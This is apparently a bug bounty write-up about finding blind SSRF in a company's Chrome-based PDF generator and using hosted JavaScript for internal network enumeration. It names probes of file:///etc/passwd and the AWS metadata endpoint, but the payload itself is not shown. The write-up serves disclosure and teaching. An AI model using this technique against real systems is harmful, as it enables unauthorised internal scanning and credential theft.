SSRF in Chrome PDF Generator

Discovery

While enumerating subdomains for a certain company, I came across a /pdf endpoint on one of their main regional websites. The endpoint contained this JavaScript, which has been modified but retains its purpose:

const params = new URLSearchParams(window.location.search);
const url = params.get('url') || '';
const type = params.get('type') || '';

fetch(`/pdf/download?url=${encodeURIComponent(url)}&type=${encodeURIComponent(type)}`)
    .then(response => response.text())
    .then(downloadUrl => {
        if (downloadUrl) {
            const link = document.createElement('a');
            link.href = downloadUrl;
            link.click();
        }
    })
    .catch(error => console.error('Download failed:', error));

// a comment like this was left here in the actual page source
//?type=pdf&url=https://subdomain.target.com/test.html

Both parameters were extracted from the URL and sent to /pdf/download.

Setting the url parameter to a Burp Collaborator payload worked, and I was able to receive callbacks with interesting HTTP headers.

This confirmed I had Blind SSRF. The IP address revealed that this was an EC2 instance. However, Blind SSRF alone does not demonstrate any impact, so I had to investigate this further.

Further Testing

I decided to first understand what the endpoint was used for, so I used the comment left behind. Visiting the /pdf endpoint again with those parameters downloaded a PDF render of the test.html site.

A quick check on the PDF via exiftool showed that it was produced by Skia/PDF m115. This meant that the PDF was generated by Chrome/Chromium version 115 using the Skia graphics library. This was inline with the User-Agent received in the callback, which indicated Chrome/115.0.0.0.

In the PDF, the page contents were rendered properly. The PDF was also stored on the server-side at https://target.com/pdf/test.pdf. A bit of fuzzing also showed that the only extension accepted was .html, and the name of the PDF was dependent on the name of the HTML file visited (i.e. target.html would produce target.pdf).

So the endpoint was performing these:

  1. Accept url/target.html from user.

  2. Start up a Chrome instance, visit url/target.html.

  3. Let the page render, then produce a PDF of the page as target.pdf.

  4. Store target.pdf on the server-side in the /pdf directory, and then redirect user to download the PDF.

From my understanding of Chrome's security features, fetching resources such as file:///etc/passwd is not allowed. Setting it to http://169.254.169.254/latest/meta-data/ also did not work, as nothing was returned. However, since there was no validation of the url parameter, I had full control over what the browser rendered and loaded.

The main impact I achieved was internal network enumeration through arbitrary JavaScript execution. A secondary impact of stored HTML injection was technically present, but I felt it did not have significant impact.

Internal Network Enumeration via JavaScript Execution

Since it was a browser visiting the site then rendering it, it meant JavaScript was being executed first. Using this, I attempted to perform some internal network enumeration. I used this site to create instances to host the HTML:

And this was the HTML I hosted:

Visiting https:///target.com/pdf/?type=pdf&url=https://instanceID.instances.httpworkbench.com/products.html to execute the payload worked, and Burp Collaborator received many callbacks like this:

The AWS metadata endpoint appeared to be properly restricted. Direct file:// access was blocked by Chrome. However, the ability to perform internal network scanning could potentially lead to discovery of internal services, credential theft, or lateral movement within the infrastructure.

Remediation

The company acknowledged this issue, and restricted public access to the /pdf endpoint. Felt great to be awarded for this!

Last updated